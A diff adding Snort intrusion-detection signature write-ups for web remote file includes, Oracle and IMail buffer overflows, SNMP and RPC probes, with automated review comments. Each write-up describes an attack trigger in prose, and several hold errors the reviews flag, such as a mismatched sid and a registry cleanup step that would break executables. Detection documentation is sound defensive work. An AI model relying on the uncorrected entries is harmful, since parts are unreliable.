+Note, these file names are the default ones and can be changed by the 
+attacker.
+
+A machine reboot is required to clear the existing process from running 
+in memory.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Hackfix
+http://www.hackfix.org/subseven/
+
+McAfee
+http://vil.mcafee.com/dispVirus.asp?virus_k=10566
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/subseven/gold/index.shtml
+
+--
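Review bot: the Corrective Action statement that HKEY_CLASSES_ROOT\exefile\shell\open\command "should be blank, i.e. """ is wrong and following it would break launching every executable on the machine; the default value of that key is "%1" %* and the cleanup step should restore that, not empty it. "Winloader" under "Registry key added:" is a value placed under the Run and RunServices keys listed just above, not a key in its own right, and those two key lines are indented inconsistently. This file has no Affected Systems section; the OS list sits in Detailed Information instead. The listening ports given in Detailed Information (27374 or 1243) are the most useful detection detail in the file and are worth repeating under Corrective Action alongside the file and registry cleanup.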
--- /dev/null
+++ b/doc/signatures/100000638.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000638
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_export.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_export.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/331.txt
@@ -0,0 +1,65 @@
+Rule: 
+reference:arachnids,132; reference:cve,CVE-1999-0612;
+classtype:attempted-recon; sid:331; rev:6;)
+
+--
+Sid: 331
+
+-- 
+
+Summary:
+This is an intelligence gathering activity. This event is indicative of an information leak attempt against a finger daemon performed by a vulnerability scanner
+
+-- 
+
+Impact:
+The attacker may obtain information about user accounts on the target system.
+
+--
+Detailed Information:
+This event is generated when an attempt to query the finger daemon is attempted by the Cybercop vulnerability scanner. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The scan will confirm that the target host will respond to finger queries.
+
+--
+
+Attack Scenarios: 
+An attacker uses the Cybercop vulnerability scanner to test for this weakness.
+
+-- 
+
+Ease of Attack: 
+Simple, performed by a scanner
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via a firewall or TCP wrappers.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS132
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0612
+
+--
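Review bot: the Rule field is a fragment: it begins at "reference:arachnids,132; reference:cve,CVE-1999-0612;" and ends with "rev:6;)", so the alert header, msg and content options that actually define sid 331 are missing. Either paste the complete rule or leave the field empty as the other signature files do. Also, "None Known" should be "None known." for consistency with the rest of the set, and "Sid: 331" on one line differs from the "Sid:" / value layout used elsewhere.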
--- /dev/null
+++ b/doc/signatures/100000640.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000640
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_manager.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_manager.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
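Review bot: the third Detailed Information paragraph and the Attack Scenarios section are generic weak-credential boilerplate that does not match a remote file include in template_manager.php via admin_template_path; the scenario to describe is an attacker-supplied URL in that parameter leading to execution of remote code. Fix "running ona web server", add the missing blank line before the "--" after "All systems running CGI applications using Indexu", and fill Additional References (the Summary asserts an exploit attempt, so a vulnerability reference should exist).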
--- /dev/null
+++ b/doc/signatures/2216.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2216
+
+--
+Summary:
+This event is generated when an attempt is made to access readmail.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in Ipswitch IMail 7.04 and earlier.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+Ipswitch IMail is a mail server that supports multiple mail protocols. Its web mail implementation contains a vulnerability in readmail.cgi where, if a mailbox name with more than 248 dot characters (.) is requested, the server will crash. It has also been reported that this is caused by a buffer overflow error that may allow an attacker to execute arbitrary code, but this has not been confirmed.
+
+--
+Affected Systems:
+Mail servers running Ipswitch Imail 7.04 and earlier with web mail enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request to readmail.cgi for a mailbox with more than 248 dot characters in the mailbox name parameter. The mail server will crash and must be restarted.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses readmail.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer version or apply the vendor-supplied hotfix available at ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail704.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/3427
+
+--
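Review bot: the Summary states this is an attempt to exploit a buffer overflow, but Detailed Information says the overflow is reported and unconfirmed and Impact lists only denial of service; align the three, for example "a request that crashes readmail.cgi in Ipswitch IMail 7.04 and earlier". Corrective Action links straight to an executable (ftp://ftp.ipswitch.com/.../imail704.exe); point to the vendor advisory page instead so the reader can verify the hotfix before running it. "Imail" in Affected Systems should match "IMail", and the reference label "Bugtraq" lacks the colon used elsewhere ("CVE:", "CERT:").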
--- /dev/null
+++ b/doc/signatures/100000837.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000837
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiniBB" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "absolute_path" parameter in the "index.php" script used by the "MiniBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiniBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
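Review bot: the file starts with two blank lines before "Rule:", unlike the other signature docs, and its third Detailed Information paragraph plus Attack Scenarios are the same weak-credential boilerplate that does not describe a remote file include through the absolute_path parameter of index.php. Replace with an include-specific scenario, fix "running ona web server", add the blank line before the "--" after the Affected Systems entry, and cite a reference in Additional References.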
--- /dev/null
+++ b/doc/signatures/1426.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1426
+
+--
+Summary:
+This event is generated when an attempt is made to attack a device using SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service (DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community string 
+buffer overflow, that will allow an attacker to execute arbitrary code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of SNMP v1 protocol
+	
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 161 
+of a vulnerable device, causing a Denial of Service or possible execution of 
+arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the SNMP v1 protocol, use SNMP v2 protocol as an alternative.
+
+Disable the use of SNMP for devices that do not need it.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-03.html
+
+--
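Review bot: the Corrective Action "use SNMP v2 protocol as an alternative" is weak advice, because SNMP v2c still authenticates with cleartext community strings; recommend SNMP v3 with authentication (and privacy) enabled, or restricting SNMP to a dedicated management network. The Summary "attack a device using SNMP v1" also does not say which of the several SNMP v1 issues covered by CA-2002-03 this rule matches; state the malformed field or request the rule looks for so analysts can judge a hit. The line after "Any implementation of SNMP v1 protocol" contains a stray tab.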
--- /dev/null
+++ b/doc/signatures/1262.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1262
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) admind is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port admind is using.  Attackers can also learn what versions of the admind protocol are accepted by admind.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as admind run.  The admind RPC service is used by some UNIX hosts to remotely perform distributed system administration tasks such as adding new users.  If weak authentication is used, it may be possible for a malicious user to perform remote administration.
+
+--
+Affected Systems:
+Any host running admind with weak authentication.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where admind runs.  This may be a precursor to accessing admind.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access admind, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for admind, not probes of the admind service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the admind service itself. An attacker may attempt to go directly to the admind port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS18
+
+
+--
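Review bot: the Corrective Action "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" reads as if access to the machines themselves is denied; say what is meant: block inbound access from untrusted networks to the portmapper (TCP/UDP 111) and to the dynamically assigned RPC service ports. The False Negatives paragraph is a good model for the rest of the set and should stay as is. The reference label "Arachnids " has trailing whitespace and no colon, and the section ends with two blank lines.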
--- /dev/null
+++ b/doc/signatures/2111.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+2111
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command DELE.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by
+sending a line feed character to a POP server via the DELE command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1939:
+http://www.faqs.org/rfcs/rfc1939.html
+
+--
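Review bot: Attack Scenarios reads "Simple.", which is the Ease of Attack value pasted into the wrong field; it should describe the scenario (an attacker connects to the POP3 service and sends a DELE command whose argument exceeds the server's buffer). Detailed Information is also unclear: "sending a line feed character" cannot by itself overflow a buffer, so name the actual trigger and the affected server product. The file has no Affected Systems section, and the only reference is RFC 1939, which documents the protocol rather than the vulnerability.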
--- /dev/null
+++ b/doc/signatures/1364.txt
@@ -0,0 +1,49 @@
+Rule:
+
+--
+Sid:
+1364
+
+--
+Summary:
+Attempted lsof command access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the processes being run on a webserver. The lsof command lists information about files that are open by the running processes.  An open file may be a regular file, a directory, a block special file, a character special file, an executing text reference, a library, a stream or a network file (Internet socket, NFS file or Unix domain socket). The attacker could possibly gain information needed for other attacks on the system.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'lsof' in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine.
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1329
+man lsof
+
+--
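Review bot: "False Positives: None Known" is too strong for a rule that matches the string "lsof" in a URI; any legitimate resource whose path contains that substring (documentation about the lsof utility, for instance) will fire it, so say so and tell analysts to inspect the full URI. In Corrective Action, "it's designated web root" should be "its", and the blank line between "Corrective Action:" and its text is inconsistent with the other files.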
--- /dev/null
+++ b/doc/signatures/100000108.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000108
+
+-- 
+Summary: 
+This event is generated when an SQL injection attempt is made against the 
+OpenBB web bulliten board system.
+
+-- 
+
+Impact: 
+Attackers may run arbitrary database commands with the privileges of the 
+affected script.
+
+--
+Detailed Information:
+This rule looks specifically for attacks against the board.php module of the 
+OpenBB program. Attackers must supply a variable whose value is numeric, 
+followed by a space, in order to exploit this vulnerability.
+
+--
+Affected Systems:
+OpenBB 1.0.5
+OpenBB 1.1.0
+
+--
+
+Attack Scenarios: 
+A web browser or a script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as example attacks that can be used with a web browser are publicly 
+available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, no vendor-supplied patches are available. A descripton of an 
+unverified workaround is available in the Additional References section.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://www.securityfocus.com/archive/1/319714
+
+-- 
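Review bot: "Currently, no vendor-supplied patches are available" is a time-bound statement that will go stale in a packaged doc; record the date or the affected versions it applies to. Detailed Information says "a variable whose value is numeric, followed by a space" without naming the vulnerable board.php parameter, so an analyst cannot tell the exploit pattern from a match; name it. The Corrective Action promises "a description of an unverified workaround" in Additional References, but that section is only a bare URL. Typos: "bulliten", "descripton".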
--- /dev/null
+++ b/doc/signatures/2783.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2783
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_unique_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
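Review bot: the sentence naming the procedure is broken across lines so that the period begins the next line ("drop_unique_resolution" / ". This procedure is included in"); join it to "...drop_unique_resolution. This procedure is included in dbms_repcat." Affected Systems lists "Oracle Oracle9i" (vendor name repeated, with a leading tab), and Additional References is empty although the text claims a known vulnerability; cite the vendor alert.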
--- /dev/null
+++ b/doc/signatures/622.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+622
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
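Review bot: the Summary "This event is generated when a scan is detected" does not distinguish sid 622 from the other SCAN rules; name the scan type or tool that this rule's packet checks identify. The Attack Scenarios example (FTP ports 21 and 20) is generic and not tied to this rule. Additional References ends with a double blank line before the closing "--".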
--- /dev/null
+++ b/doc/signatures/100000670.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000670
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "web_statsConfig.php" using a remote file being passed as 
+the "mod_dir" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "mod_dir" parameter in the "web_statsConfig.php" script 
+used by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
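Review bot: the third Detailed Information paragraph and Attack Scenarios are weak-credential boilerplate that does not describe a remote file include through the mod_dir parameter of web_statsConfig.php; replace with an include-specific scenario. Fix "running ona web server", add the blank line before the "--" after "All systems running CGI applications using Harpia", and cite a reference in Additional References.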
--- /dev/null
+++ b/doc/signatures/2844.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2844
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
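Review bot: same layout defect as the other Oracle docs: the period after "refresh_snapshot_repgroup" begins its own line; join to "...refresh_snapshot_repgroup. This procedure is included in sys.dbms_repcat_sna_utl." Affected Systems has "Oracle Oracle9i" with a leading tab, and Additional References is empty despite the "known vulnerability" wording.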
--- /dev/null
+++ b/doc/signatures/2385.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+2385
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
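Review bot: the file has no Attack Scenarios section (it goes from Affected Systems straight to Ease of Attack), and its last section is headed "References:" instead of the "Additional References:" used by every other file, which will break anything that parses these headings. Typos: "taget", "excuted". "CAN-2003-0818" is the candidate-era form of the identifier; CVE-2003-0818 is the same entry.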
--- /dev/null
+++ b/doc/signatures/1355.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1349
+
+--
+Summary:
+Attempted /usr/bin/perl access via web
+
+--
+Impact:
+Attempt to execute a perl script on a host.
+
+--
+Detailed Information:
+This is an attempt to execute a perl script on a host. perl is a scripting language that is available on a wide variety of platforms. By default perl code runs with full access to all libraries and inbuilt commands available to the language. When combined with the access permissions of the user executing the script, the consequences of running arbitrary code can be devastating
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP transaction that includes a reference to perl in the URI.
+
+--
+Ease of Attack:
+Simple HTTP.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. perl may also be requested on a command line should the attacker gain access to the machine. Whenever possible, all perl scripts on the host should be written using the restriceted access mode. This forces perl to execute the scripts in a "sandbox" which will disallow unsafe operations in the code.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1350
+
+--
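Review bot: the Sid field says 1349 but the file is 1355.txt, so one of the two is wrong and an index built from these files will attach this description to the wrong rule; check which sid the /usr/bin/perl rule carries and fix the mismatch. Also "it's designated web root" should be "its", "restriceted" should be "restricted", and the "--" after Corrective Action lacks the preceding blank line.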
--- /dev/null
+++ b/doc/signatures/100000573.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000573
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_setup.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "app_setup.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
